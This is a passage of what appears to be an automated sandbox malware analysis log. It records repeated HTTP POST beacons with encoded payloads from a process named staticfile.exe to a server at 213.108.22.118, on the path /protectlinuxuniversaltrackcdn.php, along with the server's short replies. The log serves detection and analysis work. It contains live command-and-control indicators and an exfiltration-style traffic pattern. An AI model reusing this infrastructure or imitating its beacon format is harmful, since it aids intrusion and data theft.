                                        Nov 30, 2024 22:37:47.826468945 CET1428OUTData Raw: 50 5a 59 54 55 55 50 5e 55 5c 57 59 50 53 5a 5d 58 54 5b 5d 51 5c 53 54 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PZYTUUP^U\WYPSZ]XT[]Q\STU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"?.54"#&?,#2;3$*%8 ,"';&3!,$._/%^/
                                        Nov 30, 2024 22:37:48.869946003 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:49.102288008 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:48 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 04 3c 06 2d 04 3f 38 25 5a 39 01 05 08 31 38 03 58 2c 03 21 58 28 39 39 1c 2a 3c 39 52 22 28 3b 5d 2a 3a 36 52 30 35 3e 58 3c 11 2b 5e 0c 1b 20 09 2b 2b 00 05 27 2b 0a 5c 24 1e 3f 00 21 21 0d 5b 30 5b 25 0b 2b 38 0c 15 23 0f 07 0c 38 0c 25 1e 26 3a 3c 5f 29 3c 3f 1e 36 39 2f 56 0b 12 22 57 26 22 25 5e 26 11 05 02 20 0e 08 1a 36 36 22 58 37 01 2d 54 36 28 2e 59 2b 00 32 13 21 30 2f 0f 3d 04 2d 5a 31 0c 30 0d 2a 3d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: <-?8%Z918X,!X(99*<9R"(;]*:6R05>X<+^ ++'+\$?!![0[%+8#8%&:<_)<?69/V"W&"%^& 66"X7-T6(.Y+2!0/=-Z10*=/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        83192.168.2.450000213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:47.604790926 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:47.951105118 CET2544OUTData Raw: 55 5d 59 5c 55 59 50 5a 55 5c 57 59 50 52 5a 57 58 54 5b 5a 51 5f 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U]Y\UYPZU\WYPRZWXT[ZQ_S^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!B( #$>4;Z<2]+$>'Z)5X7/-W3'$ !9._/%^/
                                        Nov 30, 2024 22:37:49.045175076 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:49.287467957 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:48 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        84192.168.2.450003213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:49.525924921 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:37:49.876483917 CET2544OUTData Raw: 50 5e 59 5f 55 5e 55 5d 55 5c 57 59 50 5e 5a 5d 58 54 5b 5c 51 5a 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P^Y_U^U]U\WYP^Z]XT[\QZSUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"*.%41$\$-7-,+S&#$-<>% /90(&U6_.._/%^/4
                                        Nov 30, 2024 22:37:50.955735922 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:51.199649096 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:50 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        85192.168.2.450008213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:51.672808886 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:52.029144049 CET2544OUTData Raw: 50 59 5c 5e 55 5d 55 5a 55 5c 57 59 50 5c 5a 53 58 55 5b 53 51 58 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PY\^U]UZU\WYP\ZSXU[SQXSUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!E?>6#7%$\/,1+<0 =7/S'=4$ *_9$._/%^/
                                        Nov 30, 2024 22:37:53.040769100 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:53.292538881 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:52 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        86192.168.2.450014213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:53.540760994 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:53.889686108 CET2544OUTData Raw: 50 5e 59 58 55 58 55 5a 55 5c 57 59 50 5f 5a 50 58 55 5b 53 51 50 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P^YXUXUZU\WYP_ZPXU[SQPS^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!B(-418\&>;3W$+<0.8(63[#/V$[<%0"Z-._/%^/0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        87192.168.2.450017213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:54.252049923 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:54.607353926 CET1428OUTData Raw: 55 5a 59 54 55 58 55 5b 55 5c 57 59 50 5e 5a 51 58 5a 5b 5c 51 5a 53 54 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UZYTUXU[U\WYP^ZQXZ[\QZSTU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!@(" 4X$>+/<4$+S$>'Y=60"<1S$-Z%-$._/%^/4
                                        Nov 30, 2024 22:37:55.672350883 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:55.924717903 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:55 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 5d 28 01 2a 58 28 01 3d 5b 39 06 2c 51 24 3b 2d 5e 2c 03 35 16 28 29 3a 00 3e 3c 22 0d 36 06 05 10 2b 2a 2e 57 30 08 22 59 28 2b 2b 5e 0c 1b 23 1d 3f 28 2d 5d 26 2b 27 01 30 30 24 11 21 0f 37 11 27 2d 0c 1f 2b 06 29 04 20 21 31 08 2c 31 25 54 26 17 2c 12 2b 3c 33 54 36 39 2f 56 0b 12 21 09 30 1c 36 03 31 3f 05 05 37 0e 32 1a 22 40 3e 1f 21 3f 2d 10 23 28 0c 5b 3f 00 39 06 23 0d 0e 1b 3d 2d 29 5f 26 32 3c 0d 3d 07 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #](*X(=[9,Q$;-^,5():><"6+*.W0"Y(++^#?(-]&+'00$!7'-+) !1,1%T&,+<3T69/V!061?72"@>!?-#([?9#=-)_&2<=/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        88192.168.2.450020213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:55.043255091 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2536
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:55.388602972 CET2536OUTData Raw: 55 5c 59 5a 50 5a 55 5c 55 5c 57 59 50 5b 5a 52 58 54 5b 5a 51 5a 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\YZPZU\U\WYP[ZRXT[ZQZSUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!C(. 8X&=88,3W1+V3')%/Z /.0[ 205-._/%^/8
                                        Nov 30, 2024 22:37:56.670649052 CET232INHTTP/1.1 100 Continue
                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 33 30 20 4e 6f 76 20 32 30 32 34 20 32 31 3a 33 37 3a 35 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 31 59 5a 51
                                        Data Ascii: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 21:37:56 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 4Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-81YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        89192.168.2.450026213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:56.913589001 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:37:57.265539885 CET2544OUTData Raw: 50 5c 59 5f 50 59 50 5e 55 5c 57 59 50 52 5a 50 58 5f 5b 53 51 5e 53 54 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P\Y_PYP^U\WYPRZPX_[SQ^STU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!B(=&\ !($=+,%;%-7=% 4<%W$]$#.._/%^/
                                        Nov 30, 2024 22:37:58.401556015 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:58.652713060 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:58 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        90192.168.2.450030213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:58.897917032 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:59.247997046 CET2544OUTData Raw: 50 5e 5c 5f 55 5f 50 5d 55 5c 57 59 50 5d 5a 53 58 5d 5b 5b 51 58 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P^\_U_P]U\WYP]ZSX][[QXS_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!C+=644Y%=?,W1+$.8)C<7U'-#%>Z-._/%^/8
                                        Nov 30, 2024 22:38:00.293981075 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:00.548609018 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:00 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        91192.168.2.450035213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:00.856471062 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        92192.168.2.450037213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:01.058532953 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1416
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:01.404828072 CET1416OUTData Raw: 50 5c 59 58 55 58 55 5a 55 5c 57 59 50 5b 5a 53 58 5d 5b 58 51 59 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P\YXUXUZU\WYP[ZSX][XQYS\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"?=*_4%,]//0&8$S%.4=5[ <=V$<1#6X.4._/%^/
                                        Nov 30, 2024 22:38:02.477922916 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:02.728805065 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:02 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 5e 3f 06 08 11 2b 16 08 01 2d 11 2f 09 24 2b 26 01 2c 13 29 5d 3f 14 13 5f 3d 02 39 1f 22 3b 3b 11 2b 29 3e 53 24 18 26 12 28 11 2b 5e 0c 1b 20 41 3c 5d 3d 58 24 05 24 59 24 1e 3c 5e 35 31 27 5e 33 3d 21 0e 3c 28 39 01 34 0f 2a 55 2f 22 25 57 32 3a 2c 5b 29 59 3f 52 35 03 2f 56 0b 12 21 0e 30 0c 0b 5e 25 2f 28 10 34 0e 3e 58 36 26 31 01 23 59 29 52 22 16 2d 03 28 3d 32 12 34 33 28 1b 28 2d 25 5e 25 0b 3f 54 3e 3d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #^?+-/$+&,)]?_=9";;+)>S$&(+^ A<]=X$$Y$<^51'^3=!<(94*U/"%W2:,[)Y?R5/V!0^%/(4>X6&1#Y)R"-(=243((-%^%?T>=/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        93192.168.2.450038213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:01.181132078 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:01.529679060 CET2544OUTData Raw: 55 5c 59 5e 55 55 50 51 55 5c 57 59 50 58 5a 57 58 5f 5b 5b 51 5a 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\Y^UUPQU\WYPXZWX_[[QZS[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!<X&^7T(]%>,,$%03;_(%3X"/-&=%36Y9._/%^/,
                                        Nov 30, 2024 22:38:02.745978117 CET232INHTTP/1.1 100 Continue
                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 33 30 20 4e 6f 76 20 32 30 32 34 20 32 31 3a 33 38 3a 30 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 31 59 5a 51
                                        Data Ascii: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 21:38:02 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 4Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-81YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        94192.168.2.450042213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:03.006900072 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:38:03.360600948 CET2544OUTData Raw: 50 5a 59 5e 50 5d 55 5d 55 5c 57 59 50 52 5a 52 58 5f 5b 5b 51 5b 53 54 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PZY^P]U]U\WYPRZRX_[[Q[STU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(1#1 $= ]//V$+4$=7=7=R'=%#994._/%^/
                                        Nov 30, 2024 22:38:04.385816097 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:04.621757984 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:04 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        95192.168.2.450048213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:04.866838932 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:05.216873884 CET2544OUTData Raw: 55 5a 59 5f 55 58 50 5f 55 5c 57 59 50 52 5a 52 58 59 5b 5d 51 5e 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
